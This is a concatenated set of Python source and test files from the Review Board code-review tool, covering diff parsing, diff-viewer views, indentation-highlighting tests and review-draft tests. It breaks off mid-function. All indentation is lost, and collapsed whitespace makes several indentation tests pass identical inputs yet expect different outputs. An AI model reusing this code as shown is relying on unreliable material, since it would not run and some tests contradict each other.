# If there is a parent file there is not necessarily an original
# revision for the parent file in the case of a renamed file in
# git.
if not orig_rev:
if parent_commit_id and f.origInfo != PRE_CREATION:
orig_rev = parent_commit_id
else:
orig_rev = f.origInfo
enc, orig_file = convert_to_unicode(f.origFile, encoding_list)
enc, dest_file = convert_to_unicode(f.newFile, encoding_list)
if f.deleted:
status = FileDiff.DELETED
elif f.moved:
status = FileDiff.MOVED
elif f.copied:
status = FileDiff.COPIED
else:
status = FileDiff.MODIFIED
filediff = FileDiff(
diffset=diffset,
source_file=parser.normalize_diff_filename(orig_file),
dest_file=parser.normalize_diff_filename(dest_file),
source_revision=smart_unicode(orig_rev),
dest_detail=f.newInfo,
binary=f.binary,
status=status)
if (parent_file and
(parent_file.moved or parent_file.copied) and
parent_file.insert_count == 0 and
parent_file.delete_count == 0):
filediff.extra_data = {'parent_moved': True}
if not validate_only:
# This state all requires making modifications to the database.
# We only want to do this if we're saving.
filediff.diff = f.data
filediff.parent_diff = parent_content
filediff.set_line_counts(raw_insert_count=f.insert_count,
raw_delete_count=f.delete_count)
filediffs.append(filediff)
if validate_only:
return None
if filediffs:
FileDiff.objects.bulk_create(filediffs)
return diffset
def _normalize_filename(self, filename, basedir):
"""Normalize a file name to be relative to the repository root."""
if filename.startswith('/'):
return filename
return os.path.join(basedir, filename).replace('\\', '/')
def _process_files(self, parser, basedir, repository, base_commit_id,
request, check_existence=False, limit_to=None):
tool = repository.get_scmtool()
for f in parser.parse():
source_filename, source_revision = tool.parse_diff_revision(
f.origFile,
f.origInfo,
moved=f.moved,
copied=f.copied)
dest_filename = self._normalize_filename(f.newFile, basedir)
source_filename = self._normalize_filename(source_filename,
basedir)
if limit_to is not None and dest_filename not in limit_to:
# This file isn't actually needed for the diff, so save
# ourselves a remote file existence check and some storage.
continue
# FIXME: this would be a good place to find permissions errors
if (source_revision != PRE_CREATION and
source_revision != UNKNOWN and
not f.binary and
not f.deleted and
not f.moved and
not f.copied and
(check_existence and
not repository.get_file_exists(source_filename,
source_revision,
base_commit_id=base_commit_id,
request=request))):
raise FileNotFoundError(source_filename, source_revision,
base_commit_id)
f.origFile = source_filename
f.origInfo = source_revision
f.newFile = dest_filename
yield f
def _compare_files(self, filename1, filename2):
"""
Compares two files, giving precedence to header files over source
files. This allows the resulting list of files to be more
intelligently sorted.
"""
if filename1.find('.') != -1 and filename2.find('.') != -1:
basename1, ext1 = filename1.rsplit('.', 1)
basename2, ext2 = filename2.rsplit('.', 1)
if basename1 == basename2:
if (ext1 in self.HEADER_EXTENSIONS and
ext2 in self.IMPL_EXTENSIONS):
return -1
elif (ext1 in self.IMPL_EXTENSIONS and
ext2 in self.HEADER_EXTENSIONS):
return 1
return cmp(filename1, filename2)
```
#### File: diffviewer/tests/test_raw_diff_chunk_generator.py
```python
from __future__ import unicode_literals
from reviewboard.diffviewer.chunk_generator import RawDiffChunkGenerator
from reviewboard.testing import TestCase
class RawDiffChunkGeneratorTests(TestCase):
"""Unit tests for RawDiffChunkGenerator."""
@property
def generator(self):
"""Create a dummy generator for tests that need it.
This generator will be void of any content. It's intended for
use in tests that need to operate on its utility functions.
"""
return RawDiffChunkGenerator('', '', '', '')
def test_get_chunks(self):
"""Testing RawDiffChunkGenerator.get_chunks"""
old = (
b'This is line 1\n'
b'Another line\n'
b'Line 3.\n'
b'la de da.\n'
)
new = (
b'This is line 1\n'
b'Line 3.\n'
b'la de doo.\n'
)
generator = RawDiffChunkGenerator(old, new, 'file1', 'file2')
chunks = list(generator.get_chunks())
self.assertEqual(len(chunks), 4)
self.assertEqual(chunks[0]['change'], 'equal')
self.assertEqual(chunks[1]['change'], 'delete')
self.assertEqual(chunks[2]['change'], 'equal')
self.assertEqual(chunks[3]['change'], 'replace')
def test_get_move_info_with_new_range_no_preceding(self):
"""Testing RawDiffChunkGenerator._get_move_info with new move range and
no adjacent preceding move range
"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertEqual(
generator._get_move_info(10, {
8: 100,
10: 200,
11: 201,
}),
(200, True))
def test_get_move_info_with_new_range_preceding(self):
"""Testing RawDiffChunkGenerator._get_move_info with new move range and
adjacent preceding move range
"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertEqual(
generator._get_move_info(10, {
8: 100,
9: 101,
10: 200,
11: 201,
}),
(200, True))
def test_get_move_info_with_existing_range(self):
"""Testing RawDiffChunkGenerator._get_move_info with existing move
range
"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertEqual(
generator._get_move_info(11, {
8: 100,
9: 101,
10: 200,
11: 201,
}),
(201, False))
def test_get_move_info_with_no_move(self):
"""Testing RawDiffChunkGenerator._get_move_info with no move range"""
generator = RawDiffChunkGenerator([], [], 'file1', 'file2')
self.assertIsNone(generator._get_move_info(500, {
8: 100,
9: 101,
10: 200,
11: 201,
}))
def test_indent_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_indentation with spaces"""
self.assertEqual(
self.generator._serialize_indentation(' ', 4),
('>>>>', ''))
def test_indent_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_indentation with tabs"""
self.assertEqual(
self.generator._serialize_indentation('\t', 8),
('——————>|', ''))
def test_indent_spaces_and_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with spaces and tabs
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>———>|', ''))
def test_indent_tabs_and_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with tabs and spaces
"""
self.assertEqual(
self.generator._serialize_indentation('\t ', 11),
('——————>|>>>',
''))
def test_indent_9_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with 9 spaces and tab
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>>>>>|', ''))
def test_indent_8_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with 8 spaces and tab
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>>>>>|', ''))
def test_indent_7_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_indentation
with 7 spaces and tab
"""
self.assertEqual(
self.generator._serialize_indentation(' \t', 8),
('>>>>>—>|', ''))
def test_unindent_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation with spaces
"""
self.assertEqual(
self.generator._serialize_unindentation(' ', 4),
('<<<<', ''))
def test_unindent_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation with tabs"""
self.assertEqual(
self.generator._serialize_unindentation('\t', 8),
('|<——————', ''))
def test_unindent_spaces_and_tabs(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with spaces and tabs
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<|<———', ''))
def test_unindent_tabs_and_spaces(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with tabs and spaces
"""
self.assertEqual(
self.generator._serialize_unindentation('\t ', 11),
('|<——————<<<',
''))
def test_unindent_9_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with 9 spaces and tab
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<<<<<|', ''))
def test_unindent_8_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with 8 spaces and tab
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<<<<|<', ''))
def test_unindent_7_spaces_and_tab(self):
"""Testing RawDiffChunkGenerator._serialize_unindentation
with 7 spaces and tab
"""
self.assertEqual(
self.generator._serialize_unindentation(' \t', 8),
('<<<<<|<—', ''))
def test_highlight_indent(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with indentation
"""
self.assertEqual(
self.generator._highlight_indentation(
'',
' foo',
True, 4, 4),
('', '<span class="indent">>>>></span> foo'))
def test_highlight_indent_with_adjacent_tag(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with indentation and adjacent tag wrapping whitespace
"""
self.assertEqual(
self.generator._highlight_indentation(
'',
'<span class="s"> </span>foo',
True, 1, 1),
('',
'<span class="s"><span class="indent">></span></span>foo'))
def test_highlight_indent_with_unexpected_chars(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with indentation and unexpected markup chars
"""
self.assertEqual(
self.generator._highlight_indentation(
'',
' <span> </span> foo',
True, 4, 2),
('', ' <span> </span> foo'))
def test_highlight_unindent(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation
"""
self.assertEqual(
self.generator._highlight_indentation(
' foo',
'',
False, 4, 4),
('<span class="unindent"><<<<</span> foo', ''))
def test_highlight_unindent_with_adjacent_tag(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and adjacent tag wrapping whitespace
"""
self.assertEqual(
self.generator._highlight_indentation(
'<span class="s"> </span>foo',
'',
False, 1, 1),
('<span class="s"><span class="unindent"><</span></span>foo',
''))
def test_highlight_unindent_with_unexpected_chars(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and unexpected markup chars
"""
self.assertEqual(
self.generator._highlight_indentation(
' <span> </span> foo',
'',
False, 4, 2),
(' <span> </span> foo', ''))
def test_highlight_unindent_with_replacing_last_tab_with_spaces(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and replacing last tab with spaces
"""
self.assertEqual(
self.generator._highlight_indentation(
'<span>\t\t </span> foo',
'',
False, 2, 16),
('<span><span class="unindent">'
'|<——————'
'|<——————'
'</span> </span> foo', ''))
def test_highlight_unindent_with_replacing_3_tabs_with_tab_spaces(self):
"""Testing RawDiffChunkGenerator._highlight_indentation
with unindentation and replacing 3 tabs with 1 tab and 8 spaces
"""
self.assertEqual(
self.generator._highlight_indentation(
'<span>\t </span> foo',
'',
False, 1, 24),
('<span><span class="unindent">'
'|<——————'
'</span> </span> foo', ''))
```
#### File: reviewboard/diffviewer/views.py
```python
from __future__ import unicode_literals
import logging
import os
import traceback
from zipfile import ZipFile
from django.conf import settings
from django.core.paginator import InvalidPage, Paginator
from django.http import (HttpResponse,
HttpResponseNotFound,
HttpResponseNotModified,
HttpResponseServerError,
Http404)
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.six.moves import cStringIO as StringIO
from django.utils.translation import ugettext as _
from django.views.generic.base import TemplateView, View
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.http import encode_etag, etag_if_none_match, set_etag
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import get_lexer_by_name
from reviewboard.diffviewer.diffutils import (get_diff_files,
get_enable_highlighting)
from reviewboard.diffviewer.errors import PatchError, UserVisibleError
from reviewboard.diffviewer.models import DiffSet, FileDiff
from reviewboard.diffviewer.renderers import (get_diff_renderer,
get_diff_renderer_class)
from reviewboard.site.urlresolvers import local_site_reverse
def get_collapse_diff(request):
if request.GET.get('expand', False):
return False
elif request.GET.get('collapse', False):
return True
elif 'collapsediffs' in request.COOKIES:
return (request.COOKIES['collapsediffs'] == "True")
else:
return True
class DiffViewerView(TemplateView):
"""Renders the main diff viewer.
This renders the diff viewer for a given DiffSet (or an interdiff
between two DiffSets). It handles loading information on the diffs,
generating the side-by-side view, and pagination.
The view expects the following parameters to be provided:
* diffset
- The DiffSet to render.
The following may also be provided:
* interdiffset
- A DiffSet object representing the other end of an interdiff range.
The following query parameters can be passed in on the URL:
* ?expand=1
- Expands all files within the diff viewer.
* ?collapse=1
- Collapses all files within the diff viewer, showing only
modifications and a few lines of context.
* ?file=<id>
- Renders only the FileDiff represented by the provided ID.
* ?page=<pagenum>
- Renders diffs found on the given page number, if the diff viewer
is paginated.
"""
template_name = 'diffviewer/view_diff.html'
fragment_error_template_name = 'diffviewer/diff_fragment_error.html'
def get(self, request, diffset, interdiffset=None, *args, **kwargs):
"""Handles GET requests for this view.
This will render the full diff viewer based on the provided
parameters.
The full rendering time will be logged.
If there's any exception thrown during rendering, an error page
with a traceback will be returned instead.
"""
self.collapse_diffs = get_collapse_diff(request)
if interdiffset:
logging.debug('Generating diff viewer page for interdiffset '
'ids %s-%s',
diffset.id, interdiffset.id, request=request)
else:
logging.debug('Generating diff viewer page for filediff id %s',
diffset.id, request=request)
try:
response = super(DiffViewerView, self).get(
request, diffset=diffset, interdiffset=interdiffset,
*args, **kwargs)
if interdiffset:
logging.debug('Done generating diff viewer page for '
'interdiffset ids %s-%s',
diffset.id, interdiffset.id, request=request)
else:
logging.debug('Done generating diff viewer page for filediff '
'id %s',
diffset.id, request=request)
return response
except Exception as e:
if interdiffset:
interdiffset_id = interdiffset.pk
else:
interdiffset_id = None
logging.exception('%s.get: Error rendering diff for diffset '
'ID=%s, interdiffset ID=%s: %s',
self.__class__.__name__,
diffset.pk,
interdiffset_id,
e,
request=request)
return exception_traceback(request, e, self.template_name)
def render_to_response(self, *args, **kwargs):
"""Renders the page to an HttpResponse.
This renders the diff viewer page, based on the context data
generated, and sets cookies before returning an HttpResponse to
the client.
"""
response = super(DiffViewerView, self).render_to_response(*args,
**kwargs)
response.set_cookie('collapsediffs', self.collapse_diffs)
return response
def get_context_data(self, diffset, interdiffset, extra_context={},
**kwargs):
"""Calculates and returns data used for rendering the diff viewer.
This handles all the hard work of generating the data backing the
side-by-side diff, handling pagination, and more. The data is
collected into a context dictionary and returned for rendering.
"""
files = get_diff_files(diffset=diffset,
interdiffset=interdiffset,
request=self.request)
# Break the list of files into pages
siteconfig = SiteConfiguration.objects.get_current()
paginator = Paginator(files,
siteconfig.get('diffviewer_paginate_by'),
siteconfig.get('diffviewer_paginate_orphans'))
page_num = int(self.request.GET.get('page', 1))
if self.request.GET.get('file', False):
file_id = int(self.request.GET['file'])
for i, f in enumerate(files):
if f['filediff'].pk == file_id:
page_num = i // paginator.per_page + 1
if page_num > paginator.num_pages:
page_num = paginator.num_pages
break
try:
page = paginator.page(page_num)
except InvalidPage:
page = paginator.page(paginator.num_pages)
diff_context = {
'revision': {
'revision': diffset.revision,
'is_interdiff': interdiffset is not None,
'interdiff_revision': (interdiffset.revision
if interdiffset else None),
},
'pagination': {
'is_paginated': page.has_other_pages(),
'current_page': page.number,
'pages': paginator.num_pages,
'page_numbers': paginator.page_range,
'has_next': page.has_next(),
'has_previous': page.has_previous(),
},
}
if page.has_next():
diff_context['pagination']['next_page'] = page.next_page_number()
if page.has_previous():
diff_context['pagination']['previous_page'] = \
page.previous_page_number()
context = dict({
'diff_context': diff_context,
'diffset': diffset,
'interdiffset': interdiffset,
'diffset_pair': (diffset, interdiffset),
'files': page.object_list,
'collapseall': self.collapse_diffs,
}, **extra_context)
return context
class DiffFragmentView(View):
"""Renders a fragment from a file in the diff viewer.
Based on the diffset data and other arguments provided, this will render
a fragment from a file in a diff. This may be the entire file, or some
chunk within.
The view expects the following parameters to be provided:
* diffset_or_id
- A DiffSet object or the ID for one.
* filediff_id
- The ID of a FileDiff within the DiffSet.
The following may also be provided:
* interdiffset_or_id
- A DiffSet object or the ID for one representing the other end of
an interdiff range.
* interfilediff_id
- A FileDiff ID for the other end of a revision range.
* chunk_index
- The index (0-based) of the chunk to render. If left out, the
entire file will be rendered.
Both ``filediff_id` and ``interfilediff_id`` need to be available in the
URL (or otherwise passed to :py:meth:`get`). ``diffset_or_id`` and
``interdiffset_or_id`` are needed in :py:meth:`process_diff_info`, and
so must be passed either in the URL or in a subclass's definition of
that method.
The caller may also pass ``?lines-of-context=`` as a query parameter to
the URL to indicate how many lines of context should be provided around
the chunk.
"""
template_name = 'diffviewer/diff_file_fragment.html'
error_template_name = 'diffviewer/diff_fragment_error.html'
patch_error_template_name = 'diffviewer/diff_fragment_patch_error.html'
def get(self, request, *args, **kwargs):
"""Handle GET requests for this view.
This will create the renderer for the diff fragment, render it, and
return it.
If there's an error when rendering the diff fragment, an error page
will be rendered and returned instead.
Args:
request (django.http.HttpRequest):
The HTTP request.
*args (tuple):
Additional positional arguments for the view.
**kwargs (dict):
Additional keyword arguments for the view.
Returns:
django.http.HttpResponse:
A response containing the rendered fragment.
"""
filediff_id = kwargs.get('filediff_id')
interfilediff_id = kwargs.get('interfilediff_id')
chunk_index = kwargs.get('chunk_index')
try:
renderer_settings = self._get_renderer_settings(**kwargs)
etag = self.make_etag(renderer_settings, **kwargs)
if etag_if_none_match(request, etag):
return HttpResponseNotModified()
diff_info_or_response = self.process_diffset_info(**kwargs)
if isinstance(diff_info_or_response, HttpResponse):
return diff_info_or_response
except Http404:
raise
except Exception as e:
logging.exception('%s.get: Error when processing diffset info '
'for filediff ID=%s, interfilediff ID=%s, '
'chunk_index=%s: %s',
self.__class__.__name__,
filediff_id,
interfilediff_id,
chunk_index,
e,
request=request)
return exception_traceback(self.request, e,
self.error_template_name)
kwargs.update(diff_info_or_response)
try:
context = self.get_context_data(**kwargs)
renderer = self.create_renderer(
context=context,
renderer_settings=renderer_settings,
*args, **kwargs)
response = renderer.render_to_response(request)
except PatchError as e:
logging.warning(
'%s.get: PatchError when rendering diffset for filediff '
'ID=%s, interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
filediff_id,
interfilediff_id,
chunk_index,
e,
request=request)
url_kwargs = {
key: kwargs[key]
for key in ('chunk_index', 'interfilediff_id',
'review_request_id', 'filediff_id',
'revision', 'interdiff_revision')
if key in kwargs and kwargs[key] is not None
}
bundle_url = local_site_reverse('patch-error-bundle',
kwargs=url_kwargs,
request=request)
if e.rejects:
lexer = get_lexer_by_name('diff')
formatter = HtmlFormatter()
rejects = highlight(e.rejects, lexer, formatter)
else:
rejects = None
return HttpResponseServerError(render_to_string(
self.patch_error_template_name,
RequestContext(request, {
'bundle_url': bundle_url,
'file': diff_info_or_response['diff_file'],
'filename': os.path.basename(e.filename),
'patch_output': e.error_output,
'rejects': mark_safe(rejects),
})))
except Exception as e:
logging.exception(
'%s.get: Error when rendering diffset for filediff ID=%s, '
'interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
filediff_id,
interfilediff_id,
chunk_index,
e,
request=request)
return exception_traceback(
self.request, e, self.error_template_name,
extra_context={
'file': diff_info_or_response['diff_file'],
})
if response.status_code == 200:
set_etag(response, etag)
return response
def make_etag(self, renderer_settings, filediff_id,
interfilediff_id=None, **kwargs):
"""Return an ETag identifying this render.
Args:
renderer_settings (dict):
The settings determining how to render this diff.
The following keys are required: ``collapse_all`` and
``highlighting``.
The following key is optional: ``show_deleted``.
filediff_id (int):
The ID of the
:py:class:`~reviewboard.diffviewer.models.FileDiff` being
rendered.
interfilediff_id (int):
The ID of the
:py:class:`~reviewboard.diffviewer.models.FileDiff` on the
other side of the diff revision, if viewing an interdiff.
**kwargs (dict):
Additional keyword arguments passed to the function.
Return:
unicode:
The encoded ETag identifying this render.
"""
etag = '%s:%s:%s:%s:%s:%s' % (
get_diff_renderer_class(),
renderer_settings['collapse_all'],
renderer_settings['highlighting'],
filediff_id,
interfilediff_id,
settings.TEMPLATE_SERIAL)
show_deleted = renderer_settings.get('show_deleted')
if show_deleted:
etag += ':%s' % show_deleted
return encode_etag(etag)
def process_diffset_info(self, diffset_or_id, filediff_id,
interfilediff_id=None, interdiffset_or_id=None,
**kwargs):
"""Process and return information on the desired diff.
The diff IDs and other data passed to the view can be processed and
converted into DiffSets. A dictionary with the DiffSet and FileDiff
information will be returned.
A subclass may instead return a HttpResponse to indicate an error
with the DiffSets.
"""
# Depending on whether we're invoked from a URL or from a wrapper
# with precomputed diffsets, we may be working with either IDs or
# actual objects. If they're objects, just use them as-is. Otherwise,
# if they're IDs, we want to grab them both (if both are provided)
# in one go, to save on an SQL query.
diffset = None
interdiffset = None
diffset_ids = []
if isinstance(diffset_or_id, DiffSet):
diffset = diffset_or_id
else:
diffset_ids.append(diffset_or_id)
if interdiffset_or_id:
if isinstance(interdiffset_or_id, DiffSet):
interdiffset = interdiffset_or_id
else:
diffset_ids.append(interdiffset_or_id)
if diffset_ids:
diffsets = DiffSet.objects.filter(pk__in=diffset_ids)
if len(diffsets) != len(diffset_ids):
raise Http404
for temp_diffset in diffsets:
if temp_diffset.pk == diffset_or_id:
diffset = temp_diffset
elif temp_diffset.pk == interdiffset_or_id:
interdiffset = temp_diffset
else:
assert False
filediff = get_object_or_404(FileDiff, pk=filediff_id, diffset=diffset)
if interfilediff_id:
interfilediff = get_object_or_404(FileDiff, pk=interfilediff_id,
diffset=interdiffset)
else:
interfilediff = None
# Store this so we don't end up causing an SQL query later when looking
# this up.
filediff.diffset = diffset
diff_file = self._get_requested_diff_file(diffset, filediff,
interdiffset, interfilediff)
if not diff_file:
raise UserVisibleError(
_('Internal error. Unable to locate file record for '
'filediff %s')
% filediff.pk)
return {
'diffset': diffset,
'interdiffset': interdiffset,
'filediff': filediff,
'diff_file': diff_file,
}
def create_renderer(self, context, renderer_settings, diff_file,
*args, **kwargs):
"""Creates the renderer for the diff.
This calculates all the state and data needed for rendering, and
constructs a DiffRenderer with that data. That renderer is then
returned, ready for rendering.
If there's an error in looking up the necessary information, this
may raise a UserVisibleError (best case), or some other form of
Exception.
"""
return get_diff_renderer(
diff_file,
extra_context=context,
template_name=self.template_name,
**renderer_settings)
def get_context_data(self, *args, **kwargs):
"""Returns context data used for rendering the view.
This can be overridden by subclasses to provide additional data for the
view.
"""
return {}
def _get_renderer_settings(self, chunk_index=None, **kwargs):
"""Calculate the render settings for the display of a diff.
This will calculate settings based on user preferences and URL
parameters. It does not calculate the state of any DiffSets or
FileDiffs.
"""
highlighting = get_enable_highlighting(self.request.user)
try:
lines_of_context = self.request.GET.get('lines-of-context', '')
lines_of_context = [int(i) for i in lines_of_context.split(',', 1)]
except (TypeError, ValueError):
lines_of_context = None
if chunk_index is not None:
try:
chunk_index = int(chunk_index)
except (TypeError, ValueError):
chunk_index = None
if lines_of_context:
collapse_all = True
elif chunk_index is not None:
# If we're currently expanding part of a chunk, we want to render
# the entire chunk without any lines collapsed. In the case of
# showing a range of lines, we're going to get all chunks and then
# only show the range. This is so that we won't have separate
# cached entries for each range.
collapse_all = False
else:
collapse_all = get_collapse_diff(self.request)
show_deleted = (self.request.GET.get('show-deleted') == '1')
return {
'chunk_index': chunk_index,
'collapse_all': collapse_all,
'highlighting': highlighting,
'lines_of_context': lines_of_context,
'show_deleted': show_deleted,
}
def _get_requested_diff_file(self, diffset, filediff, interdiffset,
interfilediff):
"""Fetches information on the requested diff.
This will look up information on the diff that's to be rendered
and return it, if found. It may also augment it with additional
data.
The file will not contain chunk information. That must be specifically
populated later.
"""
files = get_diff_files(diffset=diffset,
interdiffset=interdiffset,
filediff=filediff,
interfilediff=interfilediff,
request=self.request)
if files:
file = files[0]
if 'index' in self.request.GET:
try:
file['index'] = int(self.request.GET.get('index'))
except ValueError:
pass
return file
return None
class DownloadPatchErrorBundleView(DiffFragmentView):
"""A view to download the patch error bundle.
This view allows users to download a bundle containing data to help debug
issues when a patch fails to apply. The bundle will contain the diff, the
original file (as returned by the SCMTool), and the rejects file, if
applicable.
"""
def get(self, request, *args, **kwargs):
"""Handle GET requests for this view.
This will create the renderer for the diff fragment and render it in
order to get the PatchError information. It then returns a response
with a zip file containing all the debug data.
If no PatchError occurred, this will return a 404.
Args:
request (django.http.HttpRequest):
The HTTP request.
*args (tuple):
Additional positional arguments for the view.
**kwargs (dict):
Additional keyword arguments for the view.
Returns:
django.http.HttpResponse:
A response containing the data bundle.
"""
try:
renderer_settings = self._get_renderer_settings(**kwargs)
etag = self.make_etag(renderer_settings, **kwargs)
if etag_if_none_match(request, etag):
return HttpResponseNotModified()
diff_info_or_response = self.process_diffset_info(**kwargs)
if isinstance(diff_info_or_response, HttpResponse):
return diff_info_or_response
except Http404:
return HttpResponseNotFound()
except Exception as e:
logging.exception(
'%s.get: Error when processing diffset info for filediff '
'ID=%s, interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
kwargs.get('filediff_id'),
kwargs.get('interfilediff_id'),
kwargs.get('chunk_index'),
e,
request=request)
return HttpResponseServerError()
kwargs.update(diff_info_or_response)
try:
context = self.get_context_data(**kwargs)
renderer = self.create_renderer(
context=context,
renderer_settings=renderer_settings,
*args, **kwargs)
renderer.render_to_response(request)
except PatchError as e:
patch_error = e
except Exception as e:
logging.exception(
'%s.get: Error when rendering diffset for filediff ID=%s, '
'interfilediff ID=%s, chunk_index=%s: %s',
self.__class__.__name__,
kwargs.get('filediff_id'),
kwargs.get('interfilediff_id'),
kwargs.get('chunk_index'),
e,
request=request)
return HttpResponseServerError()
else:
return HttpResponseNotFound()
zip_data = StringIO()
with ZipFile(zip_data, 'w') as zipfile:
basename = os.path.basename(patch_error.filename)
zipfile.writestr('%s.orig' % basename, patch_error.orig_file)
zipfile.writestr('%s.diff' % basename, patch_error.diff)
if patch_error.rejects:
zipfile.writestr('%s.rej' % basename, patch_error.rejects)
if patch_error.new_file:
zipfile.writestr('%s.new' % basename, patch_error.new_file)
rsp = HttpResponse(zip_data.getvalue(),
content_type='application/zip')
rsp['Content-Disposition'] = \
'attachment; filename=%s.zip' % basename
return rsp
def exception_traceback_string(request, e, template_name, extra_context={}):
context = {'error': e}
context.update(extra_context)
if not isinstance(e, UserVisibleError):
context['trace'] = traceback.format_exc()
if request:
request_context = RequestContext(request, context)
else:
request_context = context
return render_to_string(template_name, request_context)
def exception_traceback(request, e, template_name, extra_context={}):
return HttpResponseServerError(
exception_traceback_string(request, e, template_name, extra_context))
```
#### File: reviews/tests/test_review_request_draft.py
```python
from __future__ import unicode_literals
import os
from django.contrib.auth.models import User
from kgb import SpyAgency
from reviewboard.accounts.models import Profile
from reviewboard.reviews.fields import (BaseEditableField,
BaseTextAreaField,
get_review_request_fieldset)
from reviewboard.reviews.models import ReviewRequest, ReviewRequestDraft
from reviewboard.scmtools.core import ChangeSet, Commit
from reviewboard.testing import TestCase
class ReviewRequestDraftTests(TestCase):
"""Unit tests for reviewboard.reviews.models.ReviewRequestDraft."""
fixtures = ['test_users', 'test_scmtools']
def test_draft_changes(self):
"""Testing recording of draft changes"""
draft = self._get_draft()
review_request = draft.review_request
old_summary = review_request.summary
old_description = review_request.description
old_testing_done = review_request.testing_done
old_branch = review_request.branch
old_bugs = review_request.get_bug_list()
draft.summary = 'New summary'
draft.description = 'New description'
draft.testing_done = 'New testing done'
draft.branch = 'New branch'
draft.bugs_closed = '12, 34, 56'
new_bugs = draft.get_bug_list()
changes = draft.publish()
fields = changes.fields_changed
self.assertIn('summary', fields)
self.assertIn('description', fields)
self.assertIn('testing_done', fields)
self.assertIn('branch', fields)
self.assertIn('bugs_closed', fields)
old_bugs_norm = set([(bug,) for bug in old_bugs])
new_bugs_norm = set([(bug,) for bug in new_bugs])
self.assertEqual(fields['summary']['old'][0], old_summary)
self.assertEqual(fields['summary']['new'][0], draft.summary)
self.assertEqual(fields['description']['old'][0], old_description)
self.assertEqual(fields['description']['new'][0], draft.description)
self.assertEqual(fields['testing_done']['old'][0], old_testing_done)
self.assertEqual(fields['testing_done']['new'][0], draft.testing_done)
self.assertEqual(fields['branch']['old'][0], old_branch)
self.assertEqual(fields['branch']['new'][0], draft.branch)
self.assertEqual(set(fields['bugs_closed']['old']), old_bugs_norm)
self.assertEqual(set(fields['bugs_closed']['new']), new_bugs_norm)
self.assertEqual(set(fields['bugs_closed']['removed']), old_bugs_norm)
self.assertEqual(set(fields['bugs_closed']['added']), new_bugs_norm)
def test_draft_changes_with_custom_fields(self):
"""Testing ReviewRequestDraft.publish with custom fields propagating
from draft to review request
"""
class RichField(BaseTextAreaField):
field_id = 'rich_field'
class SpecialRichField(BaseTextAreaField):
# Exercise special case field name 'text'
field_id = 'text'
class BasicField(BaseEditableField):
field_id = 'basic_field'
fieldset = get_review_request_fieldset('main')
fieldset.add_field(RichField)
fieldset.add_field(SpecialRichField)
fieldset.add_field(BasicField)
try:
draft = self._get_draft()
review_request = draft.review_request
draft.description = 'New description'
draft.extra_data['rich_field'] = '**Rich custom text**'
draft.extra_data['rich_field_text_type'] = 'markdown'
draft.extra_data['text'] = 'Nothing special'
draft.extra_data['text_type'] = 'plain'
draft.extra_data['basic_field'] = 'Basic text'
draft.publish()
self.assertNotIn('description_text_type',
review_request.extra_data)
self.assertIn('rich_field', review_request.extra_data)
self.assertIn('rich_field_text_type', review_request.extra_data)
self.assertIn('text', review_request.extra_data)
self.assertIn('text_type', review_request.extra_data)
self.assertIn('basic_field', review_request.extra_data)
self.assertNotIn('basic_field_text_type',
review_request.extra_data)
self.assertEqual(review_request.description, draft.description)
self.assertEqual(review_request.extra_data['rich_field'],
draft.extra_data['rich_field'])
self.assertEqual(review_request.extra_data['rich_field_text_type'],
draft.extra_data['rich_field_text_type'])
self.assertEqual(review_request.extra_data['text'],
draft.extra_data['text'])
self.assertEqual(review_request.extra_data['text_type'],
draft.extra_data['text_type'])
self.assertEqual(review_request.extra_data['basic_field'],
draft.extra_data['basic_field'])
finally:
fieldset.remove_field(RichField)
fieldset.remove_field(SpecialRichField)
fieldset.remove_field(BasicField)
def _get_draft(self):
"""Convenience function for getting a new draft to work with."""
review_request = self.create_review_request(publish=True)
return ReviewRequestDraft.create(review_request)
class PostCommitTests(SpyAgency, TestCase):
"""Unit tests for post-commit support in ReviewRequestDraft."""
fixtures = ['test_users', 'test_scmtools']
def setUp(self):
super(PostCommitTests, self).setUp()
self.user = User.objects.create(username='testuser', password='')
self.profile, is_new = Profile.objects.get_or_create(user=self.user)
self.profile.save()
self.testdata_dir = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'..', 'scmtools', 'testdata')
self.repository = self.create_repository(tool_name='Test')
def test_update_from_committed_change(self):
"""Testing ReviewRequestDraft.update_from_commit_id with committed
change
"""
commit_id = '4'
def get_change(repository, commit_to_get):
self.assertEqual(commit_id, commit_to_get)
